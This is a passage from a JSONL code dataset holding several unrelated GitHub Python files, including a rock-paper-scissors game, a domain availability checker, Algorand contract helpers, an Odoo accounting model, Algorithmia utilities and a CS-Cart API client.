cpu_option == 2):\n print(f\"User won!\\n{user_choice['name']} beats {cpu_choice['name']} any day!\\n\")\n user_score += 1\n else:\n print(f\"CPU won!\\n{cpu_choice['name']} beats {user_choice['name']} any day!\\n\")\n cpu_score += 1\n\n round_count += 1\n print(\"-------------------------------------------------------------\");\n\n print(\"Final Scores:\")\n print(f\"User: {user_score}\\tCPU: {cpu_score}\\n\")\n\n if user_score > cpu_score:\n print(\"User wins the game!\")\n else:\n print(\"CPU wins the game!\")\n\n ans = input(\"Play again? (Y/N): \").lower()\n if ans == \"y\":\n print(clear_screen_command);\n playRockPaperScissors()\n\nplayRockPaperScissors()","repo_name":"Ehiane/100_days_of_code_in_python-Projects","sub_path":"RPS/rock_paper_scissors.py","file_name":"rock_paper_scissors.py","file_ext":"py","file_size_in_byte":2999,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"10922676874","text":"import logging\nimport os\nfrom pathlib import Path\n\nimport click\nimport sys\nimport datetime\nfrom random import randint\nfrom time import sleep\nfrom config import DOMAIN_EXTENSIONS, JSON_PATH, WORDS_PATH\nfrom helper import is_domain_name_available, add_to_json_file\n\n\n@click.command()\n@click.option('--start_index', default=0, help='Number of greetings.')\ndef main(start_index):\n \"\"\"\n Check the availability of domains in words.txt file using each of the DOMAIN_EXTENSIONS in the config.py file\n @param: start_index: Program will run from Xth word in word file to the end. Use when whoisquery server blocks\n you and crashes program\n \"\"\"\n # Create log directory\n os.makedirs(Path(__file__).parent / '../logs', exist_ok=True)\n # Configure logger\n logger = logging.getLogger()\n logger.setLevel(logging.INFO)\n date = datetime.datetime.now().replace(microsecond=0)\n output_file_handler = logging.FileHandler(f\"logs/output-{date}.log\")\n stdout_handler = logging.StreamHandler(sys.stdout)\n logger.addHandler(output_file_handler)\n logger.addHandler(stdout_handler)\n # Read .txt file with words\n with open(WORDS_PATH, 'r') as f:\n words = [line.replace('\\n', '').lower() for line in f.readlines()]\n total_lines = len(words)\n current_count = start_index + 1\n # For every word in the file starting at the Xth word indicated by start_index,\n # check if domain is available given different DOMAIN_EXTENSIONS\n for word in words[start_index:]:\n domain_data = {word: []}\n for domain_extension in DOMAIN_EXTENSIONS:\n domain_name = f\"{word}{domain_extension}\"\n is_available = is_domain_name_available(domain_name, total_lines, current_count)\n if is_available:\n domain_data[word].append(domain_name)\n current_count += 1\n sleep(randint(5, 10))\n if len(domain_data[word]) != 0:\n add_to_json_file(JSON_PATH, domain_data)\n\n logger.info('Finished')\n\nif __name__ == '__main__':\n main()\n","repo_name":"pfournier1/DomainAvailabilityChecker","sub_path":"domain_availability_checker/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"34694115418","text":"\"\"\" from https://raw.githubusercontent.com/algorand/docs/master/examples/smart_contracts/v2/python/stateful_smart_contracts.py \"\"\"\n# TODO 0209: Fix local state read etc.\n# TODO 0209: Add new contract for stake.\n# TODO 0209: Dispense some asset for test accounts.\nimport base64\nfrom typing import Literal, TypedDict, overload\n\nfrom algosdk import account, mnemonic\nfrom algosdk.future import transaction\nfrom algosdk.v2client.algod import AlgodClient\n\nfrom artificial_algorand_contract.helper.external import open_algo_explorer\n\nfrom ..classes.algo_config import TestAccounts, algo_config\nfrom ..classes.algorand import AlgoAcc, TealNoOpArgs, TealPackage\nfrom .transaction_helper import get_default_params, wait_for_confirmation\n\n\n# helper function to compile program source\ndef compile_program(client: AlgodClient, source_code: str):\n return base64.b64decode(client.compile(source_code)[\"result\"])\n\n\n# create new application\ndef create_app(\n client: AlgodClient,\n private_key,\n approval_program,\n clear_program,\n global_schema,\n local_schema,\n):\n # define sender as creator\n sender = account.address_from_private_key(private_key)\n\n # declare on_complete as NoOp\n on_complete = transaction.OnComplete.NoOpOC.real\n\n params = get_default_params(client)\n\n # create unsigned transaction\n txn = transaction.ApplicationCreateTxn(\n sender,\n params,\n on_complete,\n approval_program,\n clear_program,\n global_schema,\n local_schema,\n )\n\n # sign transaction\n signed_txn = txn.sign(private_key)\n tx_id = signed_txn.transaction.get_txid()\n\n # send transaction\n client.send_transactions([signed_txn])\n\n # await confirmation\n wait_for_confirmation(client, tx_id)\n\n # display results\n transaction_response = client.pending_transaction_info(tx_id)\n app_id = transaction_response[\"application-index\"]\n print(\"Created new app-id: \", app_id)\n\n return app_id\n\n\n# opt-in to application\ndef opt_in_app(client: AlgodClient, private_key, index):\n # declare sender\n sender = account.address_from_private_key(private_key)\n print(\"OptIn from account: \", sender)\n\n params = get_default_params(client)\n\n # create unsigned transaction\n txn = transaction.ApplicationOptInTxn(sender, params, index)\n\n # sign transaction\n signed_txn = txn.sign(private_key)\n tx_id = signed_txn.transaction.get_txid()\n\n # send transaction\n client.send_transactions([signed_txn])\n\n # await confirmation\n wait_for_confirmation(client, tx_id)\n\n # display results\n transaction_response = client.pending_transaction_info(tx_id)\n print(\"OptIn to app-id: \", transaction_response[\"txn\"][\"txn\"][\"apid\"])\n\n\n# call application\ndef call_app(client: AlgodClient, private_key, index, app_args):\n # declare sender\n sender = account.address_from_private_key(private_key)\n print(\"Call from account: \", sender)\n\n params = get_default_params(client)\n # create unsigned transaction\n txn = transaction.ApplicationNoOpTxn(sender, params, index, app_args)\n\n # sign transaction\n signed_txn = txn.sign(private_key)\n tx_id = signed_txn.transaction.get_txid()\n\n # send transaction\n client.send_transactions([signed_txn])\n\n # await confirmation\n wait_for_confirmation(client, tx_id)\n\n # display results\n transaction_response = client.pending_transaction_info(tx_id)\n print(\"Called app-id: \", transaction_response[\"txn\"][\"txn\"][\"apid\"])\n if \"global-state-delta\" in transaction_response:\n print(\"Global State updated :\\n\", transaction_response[\"global-state-delta\"])\n if \"local-state-delta\" in transaction_response:\n print(\"Local State updated :\\n\", transaction_response[\"local-state-delta\"])\n\n\n# read user local state\ndef read_local_state(client: AlgodClient, addr, app_id):\n results = client.account_info(addr)\n\n local_state = results[\"apps-local-state\"]\n print(\n f\"local_state of account {addr} (showing all) for app_id {app_id}: \",\n local_state,\n # TODO: this key doesn't exist. Maybe old version? #pragma version 2\n )\n # for index in local_state:\n # if local_state[index] == app_id:\n # print(\n # f\"local_state of account {addr} for app_id {app_id}: \",\n # # local_state[\"key-value\"],\n # # TODO: this key doesn't exist. Maybe old version? #pragma version 2\n # )\n\n\n# read app global state\n# TODO: this and read local state should go to client helper (new file).\ndef read_global_state(client: AlgodClient, addr, app_id):\n results = client.account_info(addr)\n apps_created = results[\"created-apps\"]\n for app in apps_created:\n if app[\"id\"] == app_id:\n print(f\"global_state for app_id {app_id}: \", app[\"params\"][\"global-state\"])\n\n\n# update existing application\ndef update_app(\n client: AlgodClient, private_key, app_id, approval_program, clear_program\n):\n # declare sender\n sender = account.address_from_private_key(private_key)\n\n # # define initial value for key \"timestamp\"\n # app_args = [b'initial value']\n\n params = get_default_params(client)\n\n # create unsigned transaction\n txn = transaction.ApplicationUpdateTxn(\n sender, params, app_id, approval_program, clear_program\n ) # , app_args)\n\n # sign transaction\n signed_txn = txn.sign(private_key)\n tx_id = signed_txn.transaction.get_txid()\n\n # send transaction\n client.send_transactions([signed_txn])\n\n # await confirmation\n wait_for_confirmation(client, tx_id)\n\n # display results\n transaction_response = client.pending_transaction_info(tx_id)\n app_id = transaction_response[\"txn\"][\"txn\"][\"apid\"]\n print(\"Updated existing app-id: \", app_id)\n\n\n# delete application\ndef delete_app(client: AlgodClient, private_key, index):\n # declare sender\n sender = account.address_from_private_key(private_key)\n\n params = get_default_params(client)\n\n # create unsigned transaction\n txn = transaction.ApplicationDeleteTxn(sender, params, index)\n\n # sign transaction\n signed_txn = txn.sign(private_key)\n tx_id = signed_txn.transaction.get_txid()\n\n # send transaction\n client.send_transactions([signed_txn])\n\n # await confirmation\n wait_for_confirmation(client, tx_id)\n\n # display results\n transaction_response = client.pending_transaction_info(tx_id)\n print(\"Deleted app-id: \", transaction_response[\"txn\"][\"txn\"][\"apid\"])\n\n\n# close out from application\ndef close_out_app(client: AlgodClient, private_key, index):\n # declare sender\n sender = account.address_from_private_key(private_key)\n\n params = get_default_params(client)\n\n # create unsigned transaction\n txn = transaction.ApplicationCloseOutTxn(sender, params, index)\n\n # sign transaction\n signed_txn = txn.sign(private_key)\n tx_id = signed_txn.transaction.get_txid()\n\n # send transaction\n client.send_transactions([signed_txn])\n\n # await confirmation\n wait_for_confirmation(client, tx_id)\n\n # display results\n transaction_response = client.pending_transaction_info(tx_id)\n print(\"Closed out from app-id: \", transaction_response[\"txn\"][\"txn\"][\"apid\"])\n\n\n# clear application\ndef clear_app(client: AlgodClient, private_key, index):\n # declare sender\n sender = account.address_from_private_key(private_key)\n\n params = get_default_params(client)\n\n # create unsigned transaction\n txn = transaction.ApplicationClearStateTxn(sender, params, index)\n\n # sign transaction\n signed_txn = txn.sign(private_key)\n tx_id = signed_txn.transaction.get_txid()\n\n # send transaction\n client.send_transactions([signed_txn])\n\n # await confirmation\n wait_for_confirmation(client, tx_id)\n\n # display results\n transaction_response = client.pending_transaction_info(tx_id)\n print(\n \"Cleared\", sender, \"from app-id: \", transaction_response[\"txn\"][\"txn\"][\"apid\"]\n )\n\n\ndef full_contract_test():\n from ..counter import counter_package # TODO: dynamic imports by name.\n\n algod_client = algo_config.client\n\n approval_program_source_initial = counter_package.approval\n approval_program_source_refactored = counter_package.approval\n clear_program_source = counter_package.clear\n\n # declare application state storage (immutable)\n local_ints = 0\n local_bytes = 0\n global_ints = 1\n global_bytes = 0\n global_schema = transaction.StateSchema(global_ints, global_bytes)\n local_schema = transaction.StateSchema(local_ints, local_bytes)\n\n # compile programs\n approval_program = compile_program(algod_client, approval_program_source_initial)\n clear_program = compile_program(algod_client, clear_program_source)\n\n # user declared account mnemonics\n creator_mnemonic = algo_config.accounts.admin.request_mnemonics()\n user_mnemonic = algo_config.accounts.bob.request_mnemonics()\n # define private keys\n creator_private_key = mnemonic.to_private_key(creator_mnemonic)\n user_private_key = mnemonic.to_private_key(user_mnemonic)\n\n # create new application\n app_id = create_app(\n algod_client,\n creator_private_key,\n approval_program,\n clear_program,\n global_schema,\n local_schema,\n )\n\n # opt-in to application\n opt_in_app(algod_client, user_private_key, app_id)\n\n # call application without arguments\n call_app(algod_client, user_private_key, app_id, None)\n\n # read local state of application from user account\n read_local_state(\n algod_client, account.address_from_private_key(user_private_key), app_id\n )\n\n # read global state of application\n read_global_state(\n algod_client, account.address_from_private_key(creator_private_key), app_id\n )\n\n # update application\n approval_program = compile_program(algod_client, approval_program_source_refactored)\n update_app(\n algod_client, creator_private_key, app_id, approval_program, clear_program\n )\n\n # call application with arguments\n # now = datetime.datetime.now().strftime(\"%H:%M:%S\")\n # app_args = [now.encode(\"utf-8\")]\n args = \"Add\"\n app_args = [args.encode(\"utf-8\")]\n call_app(algod_client, user_private_key, app_id, app_args)\n\n # read local state of application from user account\n read_local_state(\n algod_client, account.address_from_private_key(user_private_key), app_id\n )\n\n # close-out from application\n close_out_app(algod_client, user_private_key, app_id)\n\n # opt-in again to application\n opt_in_app(algod_client, user_private_key, app_id)\n\n # call application with arguments\n call_app(algod_client, user_private_key, app_id, app_args)\n\n # read local state of application from user account\n read_local_state(\n algod_client, account.address_from_private_key(user_private_key), app_id\n )\n\n # delete application\n delete_app(algod_client, creator_private_key, app_id)\n\n # clear application from user account\n clear_app(algod_client, user_private_key, app_id)\n\n\ndef test_clean_up(app_id: int):\n algod_client = algo_config.client\n creator_mnemonic = algo_config.accounts.admin.request_mnemonics()\n creator_private_key = mnemonic.to_private_key(creator_mnemonic)\n delete_app(algod_client, creator_private_key, app_id)\n","repo_name":"Artcoin-Network/artificix-algorand-contract","sub_path":"artificial_algorand_contract/helper/contract_helper.py","file_name":"contract_helper.py","file_ext":"py","file_size_in_byte":11298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71428623913","text":"#!/usr/bin/env python3\nimport sys\n\nfiles = sys.argv[1:]\n\noutlines = list()\n# COLLECT INPUTS\nfor file in files:\n\twith open(file, 'r') as fh:\n\t\toutlines.extend(fh.readlines())\n\n# WRITE OUT TO GROUP\nfor line in outlines:\n\tsys.stdout.write(line)","repo_name":"kmayerb/nf-templates","sub_path":"collect_groups_of_files/bin/concat.py","file_name":"concat.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37737374470","text":"from step0_Doc3D_obj import Doc3D\n\nclass Kong_Doc3D(Doc3D):\n def __init__(self, root, use_sep_name=True):\n super(Kong_Doc3D, self).__init__(root)\n self.db_base_name_dir_string = self.db_root + \"/0_dis_img/%02i\" ### overwrite 父class\n # self.db_base_name_dir_string = self.db_root + \"/2_wc-4_W_w_M_npy/%02i\" ### overwrite 父class, 有些不完整的 Kong_Doc3D 可能會用到, 比如 500GB SSD 容量太小只能裝不完整 Kong_Doc3D\n\n self.use_sep_name = use_sep_name\n\n self._dis_img_paths = None\n self._rec_hope_paths = None\n self._uv_npy_paths = None\n self._uv_visual_paths = None\n self._uv_knpy_paths = None\n self._wc_npy_paths = None\n self._wc_2D_visual_paths = None\n self._wc_3D_visual_paths = None\n self._W_w_M_npy_paths = None\n self._W_w_M_knpy_paths = None\n\n @property\n def dis_img_paths(self):\n if(self._dis_img_paths is None): self.get_doc3d_kinds_of_paths()\n return self._dis_img_paths\n\n @property\n def rec_hope_paths(self):\n if(self._rec_hope_paths is None): self.get_doc3d_kinds_of_paths()\n return self._rec_hope_paths\n\n @property\n def uv_npy_paths(self):\n if(self._uv_npy_paths is None): self.get_doc3d_kinds_of_paths()\n return self._uv_npy_paths\n\n @property\n def uv_visual_paths(self):\n if(self._uv_visual_paths is None): self.get_doc3d_kinds_of_paths()\n return self._uv_visual_paths\n\n @property\n def uv_knpy_paths(self):\n if(self._uv_knpy_paths is None): self.get_doc3d_kinds_of_paths()\n return self._uv_knpy_paths\n\n @property\n def wc_npy_paths(self):\n if(self._wc_npy_paths is None): self.get_doc3d_kinds_of_paths()\n return self._wc_npy_paths\n\n @property\n def wc_2D_visual_paths(self):\n if(self._wc_2D_visual_paths is None): self.get_doc3d_kinds_of_paths()\n return self._wc_2D_visual_paths\n\n @property\n def wc_3D_visual_paths(self):\n if(self._wc_3D_visual_paths is None): self.get_doc3d_kinds_of_paths()\n return self._wc_3D_visual_paths\n\n @property\n def W_w_M_npy_paths(self):\n if(self._W_w_M_npy_paths is None): self.get_doc3d_kinds_of_paths()\n return self._W_w_M_npy_paths\n\n @property\n def W_w_M_knpy_paths(self):\n if(self._W_w_M_knpy_paths is None): self.get_doc3d_kinds_of_paths()\n return self._W_w_M_knpy_paths\n\n def get_doc3d_kinds_of_paths(self): ### overwrite 父class\n print(\"get_doc3d_kinds_of_paths( here~~~~~ should just be used only once!應該只會被用到一次\")\n self._get_base_name() ### reuse 父class\n\n self._dis_img_paths = []\n self._rec_hope_paths = []\n self._uv_npy_paths = []\n self._uv_visual_paths = []\n self._uv_knpy_paths = []\n self._wc_npy_paths = []\n self._wc_2D_visual_paths = []\n self._wc_3D_visual_paths = []\n self._W_w_M_npy_paths = []\n self._W_w_M_knpy_paths = []\n\n ### 看看有沒有用 sep_name\n if(self.use_sep_name is True): use_what_names = self.page_names_w_dir_combine_sep\n else: use_what_names = self.page_names_w_dir_combine\n\n for use_what_name in use_what_names: ### reuse 父class\n self._dis_img_paths .append(self.db_root + \"/0_dis_img/\" + use_what_name + \".png\" )\n self._rec_hope_paths .append(self.db_root + \"/0_rec_hope/\" + use_what_name + \".png\" )\n self._uv_npy_paths .append(self.db_root + \"/1_uv-1_npy/\" + use_what_name + \".npy\" )\n self._uv_visual_paths .append(self.db_root + \"/1_uv-2_visual/\" + use_what_name + \".jpg\" )\n self._uv_knpy_paths .append(self.db_root + \"/1_uv-3_knpy/\" + use_what_name + \".knpy\" )\n self._wc_npy_paths .append(self.db_root + \"/2_wc-1_npy/\" + use_what_name + \".npy\" )\n self._wc_2D_visual_paths .append(self.db_root + \"/2_wc-2_2D_visual/\" + use_what_name + \".jpg\" )\n self._wc_3D_visual_paths .append(self.db_root + \"/2_wc-3_3D_visual/\" + use_what_name + \".jpg\" )\n self._W_w_M_npy_paths .append(self.db_root + \"/2_wc-4_W_w_M_npy/\" + use_what_name + \".npy\" )\n self._W_w_M_knpy_paths .append(self.db_root + \"/2_wc-5_W_w_M_knpy/\" + use_what_name + \".knpy\" )\n\nkong_doc3D = Kong_Doc3D(root=r\"E:\\data_dir\\datasets\\type8_blender\\kong_doc3d\\train\") ### 127.23 2022/04/11\n\nif(__name__ == \"__main__\"):\n print(\"dis_img_paths :\", kong_doc3D.dis_img_paths[0])\n print(\"rec_hope_paths :\", kong_doc3D.rec_hope_paths[0])\n print(\"uv_npy_paths :\", kong_doc3D.uv_npy_paths[0])\n print(\"uv_visual_paths :\", kong_doc3D.uv_visual_paths[0])\n print(\"uv_knpy_paths :\", kong_doc3D.uv_knpy_paths[0])\n print(\"wc_npy_paths :\", kong_doc3D.wc_npy_paths[0])\n print(\"wc_2D_visual_paths :\", kong_doc3D.wc_2D_visual_paths[0])\n print(\"wc_3D_visual_paths :\", kong_doc3D.wc_3D_visual_paths[0])\n print(\"W_w_M_npy_paths :\", kong_doc3D.W_w_M_npy_paths[0])\n print(\"W_w_M_knpy_paths :\", kong_doc3D.W_w_M_knpy_paths[0])\n","repo_name":"KongBOy/kong_Doc3D","sub_path":"step0_Kong_Doc3D.py","file_name":"step0_Kong_Doc3D.py","file_ext":"py","file_size_in_byte":5261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24018904309","text":"from odoo import api, fields, models, _\nfrom odoo.exceptions import UserError\n\nclass AccountMove(models.Model):\n _name = 'account.move'\n _inherit = ['account.move', 'utm.mixin']\n\n\n id_theos = fields.Char('Theos ID')\n\n\n def unlink(self):\n downpayment_lines = self.mapped('line_ids.balcon_line_ids').filtered(lambda line: line.is_downpayment and line.invoice_lines <= self.mapped('line_ids'))\n res = super(AccountMove, self).unlink()\n if downpayment_lines:\n downpayment_lines.unlink()\n return res\n\n @api.onchange('partner_id')\n def _onchange_partner_id(self):\n res = super(AccountMove, self)._onchange_partner_id()\n return res\n\n\n def _reverse_moves(self, default_values_list=None, cancel=False):\n # OVERRIDE\n if not default_values_list:\n default_values_list = [{} for move in self]\n\n return super()._reverse_moves(default_values_list=default_values_list, cancel=cancel)\n\n def action_post(self):\n #inherit of the function from account.move to validate a new tax and the priceunit of a downpayment\n res = super(AccountMove, self).action_post()\n line_ids = self.mapped('line_ids').filtered(lambda line: line.balcon_line_ids.is_downpayment)\n for line in line_ids:\n try:\n line.balcon_line_ids.tax_id = line.tax_ids\n if all(line.tax_ids.mapped('price_include')):\n line.balcon_line_ids.price_unit = line.price_unit\n else:\n #To keep positive amount on the sale order and to have the right price for the invoice\n #We need the - before our untaxed_amount_to_invoice\n line.balcon_line_ids.price_unit = -line.balcon_line_ids.untaxed_amount_to_invoice\n except UserError:\n # a UserError here means the SO was locked, which prevents changing the taxes\n # just ignore the error - this is a nice to have feature and should not be blocking\n pass\n return res\n\n def _post(self, soft=True):\n # OVERRIDE\n # Auto-reconcile the invoice with payments coming from transactions.\n # It's useful when you have a \"paid\" sale order (using a payment transaction) and you invoice it later.\n posted = super()._post(soft)\n\n for invoice in posted.filtered(lambda move: move.is_invoice()):\n payments = invoice.mapped('transaction_ids.payment_id')\n move_lines = payments.line_ids.filtered(lambda line: line.account_internal_type in ('receivable', 'payable') and not line.reconciled)\n for line in move_lines:\n invoice.js_assign_outstanding_line(line.id)\n return posted\n\n def action_invoice_paid(self):\n # OVERRIDE\n res = super(AccountMove, self).action_invoice_paid()\n todo = set()\n for invoice in self.filtered(lambda move: move.is_invoice()):\n for line in invoice.invoice_line_ids:\n for balcon_line in line.balcon_line_ids:\n todo.add((balcon_line.order_id, invoice.name))\n for (order, name) in todo:\n order.message_post(body=_(\"Invoice %s paid\", name))\n return res\n","repo_name":"huntergps/dpng","sub_path":"l10n_ec_balcon/models/account_move.py","file_name":"account_move.py","file_ext":"py","file_size_in_byte":3252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8182188263","text":"import os\nimport sys\nimport shutil\nimport getpass\nimport subprocess\n\nimport Algorithmia\nfrom Algorithmia.errors import AlgorithmException\n\nclient = Algorithmia.client()\nin_algorithmia = True if os.environ.get(\"ALGORITHMIA_API\", False) else False\n\n\nclass BaseAPI(object):\n def __init__(self):\n self._model = None\n\n def get_model(self):\n \"\"\"Singleton for the model\n \"\"\"\n if self._model is None:\n print(\"BaseAPI: Loading model\")\n self._model = self.load_model()\n print(\"BaseAPI: Model loaded\")\n return self._model\n\n model = property(get_model)\n\n def load_model(self):\n \"\"\"Subclasses must implement this method\n\n It should return an object that will be available as the .model property\n \"\"\"\n raise NotImplementedError\n\n def apply(self, input):\n if isinstance(input, dict):\n if \"ping\" in input.keys():\n return True\n elif \"debug\" in input.keys():\n return self.debug_info_all()\n elif \"health\" in input.keys():\n status = \"live\"\n if self._model:\n status = \"model_loaded\"\n return {\"status\": status}\n elif \"load\" in input.keys():\n self.get_model()\n return \"ok\"\n elif \"predict\" in input.keys():\n self.get_model()\n return self.predict(input[\"predict\"])\n else:\n raise AlgorithmException(\"Invalid input JSON format\")\n else:\n raise AlgorithmException(\"Input should be JSON\")\n\n def debug_info_all(self):\n data = {}\n data[\"env\"] = dict(os.environ)\n data[\"sys_prefix\"] = sys.prefix\n data[\"whoami\"] = getpass.getuser()\n data[\"in_algorithmia\"] = in_algorithmia\n data[\"which_python\"] = shutil.which(\"python\")\n data[\"pip_freeze\"] = subprocess.check_output([\"pip\", \"freeze\"]).decode(\"utf-8\")\n\n data.update(self.debug_info())\n return data\n\n def debug_info(self):\n return {}\n\n def predict(self, input):\n raise NotImplementedError\n\n\ndef extract_tar_gz(file, output_dir=\"./models\"):\n \"\"\"\n Extract a .tar.gz\n\n Parameters\n ----------\n output_dir (default=\"./models\"): Where to extract the .tar.gz\n\n Returns\n ------\n output_dir: full path to the output directory where files where extracted\n \"\"\"\n os.makedirs(output_dir, exist_ok=True)\n\n try:\n output = subprocess.check_output(\n \"tar -C {output} -xzf {targz}\".format(output=output_dir, targz=file),\n stderr=subprocess.STDOUT,\n shell=True,\n ).decode()\n except subprocess.CalledProcessError as ex:\n output = ex.output.decode()\n raise Exception(\"Could not extract file: %s\" % output)\n\n return os.path.realpath(os.path.join(output_dir))\n\n\ndef get_file(remote_fpath):\n \"\"\"\n Download a file hosted on Algorithmia Hosted Data\n\n If the file ends with .tar.gz it will untar the file.\n It's recommended that the tar file contain a single files compressed like:\n tar -czvf model.format.tar.gz model.format\n\n Returns the local file path of the downloaded file\n \"\"\"\n basename = os.path.basename(remote_fpath)\n\n if remote_fpath.startswith(\"data://\"):\n # Download from Algoritmia hosted data\n local_fpath = client.file(remote_fpath).getFile().name\n\n if basename.endswith(\".tar.gz\"):\n output_dir = extract_tar_gz(fname)\n no_ext = basename[: -len(\".tar.gz\")]\n local_fpath = os.path.join(output_dir, no_ext)\n\n return local_fpath\n\n return remote_fpath\n\n\ndef exists(username, collection, fname=None, connector=\"data\"):\n if fname is None:\n path = f\"{connector}://{username}/{collection}\"\n obj = client.dir(path)\n return obj.exists()\n else:\n path = f\"{connector}://{username}/{collection}/{fname}\"\n obj = client.file(path)\n return obj.exists()\n\n\ndef upload_file(\n local_filename, username, collection, fname, connector=\"data\",\n):\n dir_exists = exists(username=username, collection=collection, connector=connector)\n if dir_exists is False:\n dir_path = f\"{connector}://{username}/{collection}/\"\n new_dir = client.dir(dir_path)\n new_dir.create()\n\n remote_file = f\"{connector}://{username}/{collection}/{fname}\"\n client.file(remote_file).putFile(local_filename)\n return remote_file\n\n\nif __name__ == \"__main__\":\n print(extract_tar_gz(\"./models/demucs_extra.th.tar.gz\"))\n","repo_name":"VamuveTV/demucs-app","sub_path":"src/algorithmia_utils.py","file_name":"algorithmia_utils.py","file_ext":"py","file_size_in_byte":4612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19969620494","text":"\"\"\" Converts CloudFormation parameters to the native format expected by the CLI.\n\nCode Pipeline expects this format:\nhttps://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/continuous-delivery-codepipeline-cfn-artifacts.html#w2ab2c13c15c13\n\nCloudFormation expects this format:\nhttps://aws.amazon.com/blogs/devops/passing-parameters-to-cloudformation-stacks-with-the-aws-cli-and-powershell/\n\nUSAGE:\n python parameters_generator.py template.json > temp.json\n\n Use to the temp.json file at a parameter file in a cloudformation CLI call:\n aws cloudformation create-stack --stack-name --template-body file://template.json --parameters file://temp.json\n\"\"\"\n\n__author__ = \"Jason DeBolt (jasondebolt@gmail.com)\"\n\nimport sys, os, json\n\ndef convert_parameters_file(obj):\n params = obj['Parameters']\n new_obj = []\n\n for param_key in params:\n new_obj.append(\n {'ParameterKey': param_key, 'ParameterValue': params[param_key]})\n return json.dumps(new_obj, indent=4)\n\ndef _parse_json(path):\n result = open(os.path.join(sys.path[0], path), 'rb').read()\n try:\n return json.loads(result)\n except json.decoder.JSONDecodeError as e:\n print('\\nYour JSON is not valid! Did you check trailing commas??\\n')\n raise(e)\n\ndef main(args):\n params_file = args[0]\n json_result = _parse_json(params_file)\n print(convert_parameters_file(json_result))\n\nif __name__ == '__main__':\n main(sys.argv[1:])\n","repo_name":"jasondebolt/phoenix-docker","sub_path":"parameters_generator.py","file_name":"parameters_generator.py","file_ext":"py","file_size_in_byte":1461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5853584481","text":"from enum import Enum\n\nfrom cscartapi.sender_requests import SenderRequests\n\n\nclass CscartAPIException(Exception):\n def __init__(self, status_code, message):\n super().__init__(self)\n self.status_code = status_code\n self.message = message\n\n def __str__(self):\n return \"[%s] %s\" % (str(self.status_code), str(self.message))\n\n\nclass CscartAPI:\n def __init__(self, base_url, username, api_key, api_version='1.0'):\n self.base_url = base_url\n if self.base_url.endswith('/') is False: # ensure self.base_url end with /\n self.base_url += '/'\n self.version = '' if api_version == '1.0' else api_version\n self.username = username\n self.api_key = api_key\n\n self.sender = SenderRequests(self.username, self.api_key)\n\n self.reset()\n\n def reset(self):\n self.method = None\n self.entity = None\n self.params = dict()\n self.data = dict()\n self.id = None\n\n def set_entity(self, entity: str):\n self.entity = entity\n\n def set_id(self, id: str):\n self.id = id\n\n def update_params(self, params: dict):\n # merge two dicts\n self.params.update(params)\n\n def update_data(self, data: dict):\n self.data.update(data)\n\n def get_url(self) -> str:\n # get base url\n url = self.base_url\n\n # get version of api\n url += 'api/' + self.version\n if not url.endswith('/'):\n url += '/'\n\n # get entity (entity must not None)\n if self.entity is None:\n raise ValueError('Entity must not be None!')\n url += self.entity + '/'\n\n # get id (if it has)\n if self.id:\n url += self.id\n\n # get params (if it has)\n if len(self.params) > 0:\n url += '?' + '&'.join(['='.join([k, v]) for k, v in self.params.items()])\n\n # return url\n return url\n\n def commit(self):\n # get url\n url = self.get_url()\n\n # get method\n method = self.method\n\n response = None\n # call sender to send request\n if method == 'GET':\n response = self.sender.get(url)\n elif method == 'POST':\n response = self.sender.post(url, self.data)\n elif method == 'PUT':\n response = self.sender.put(url, self.data)\n elif method == 'DELETE':\n response = self.sender.delete(url)\n else:\n raise TypeError(method + \" not in sender.Method list.\") # 访问方法超出API允许范围\n\n # get response (raise exception when error)\n if 'message' in response.keys(): # error accourd\n raise CscartAPIException(response['status'], response['message'])\n\n # TODO logging\n\n # reset api\n self.reset()\n\n # return response\n return response\n\n def get(self, entity: str, id: str | None = None):\n self.method = 'GET' \n self.sets(entity=entity, id=id)\n return self\n\n def create(self, entity: str, data: dict):\n self.method = 'POST' \n self.sets(entity=entity, data=data)\n return self\n\n def delete(self, entity: str, id: str):\n self.method = 'DELETE' \n self.sets(entity=entity, id=id)\n return self\n\n def update(self, entity: str, id: str, data: dict):\n self.method = 'PUT' \n self.sets(entity=entity, id=id, data=data)\n return self\n\n def sets(self, entity: str, id: str | None = None, data: dict | None = None):\n self.set_entity(entity)\n self.set_id(id)\n if data is not None:\n self.update_data(data)\n\n def order_by(self, key: str, sort_order: Enum('asc', 'desc') = 'desc'):\n self.update_params({\n 'sort_by': key,\n 'sort_order': str(sort_order),\n })\n return self\n\n def page(self, page: int, items_per_page: int | None = None):\n self.update_params({'page': str(page)})\n if items_per_page is not None:\n self.update_params({'items_per_page': str(items_per_page)})\n return self\n\n def filter(self, key: str, value: str):\n self.update_params({\n key: value,\n })\n return self\n","repo_name":"richard-ma/cscartapi","sub_path":"cscartapi/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39591510675","text":"import lab_odev1\n\nprint('\\nMETHODLAR LİSTESİ')\nprint('\\n1. REGULA FALSİ')\nprint('\\n2. NEWTON RAPHSON')\nprint('\\n3. SECANT')\n\nchoice = input('Yapmak istediğiniz işlemi giriniz:')\nchoice = int(choice)\n\nif choice == 1:\n xl = input('İlk Tahmin: ')\n xh = input('İkinci Tahmin:')\n max_hata = input('Maksimum Hata:')\n max_iter = input('Maksimum iterasyon sayısı')\n\n xl = float(xl)\n xh = float(xh)\n max_hata = float(max_hata)\n max_iter = int(max_iter)\n\n print(lab_odev1.my_regula_falsi(xl, xh, max_hata, max_iter))\n\nelif choice == 2:\n x0 = input('Tahmin: ')\n 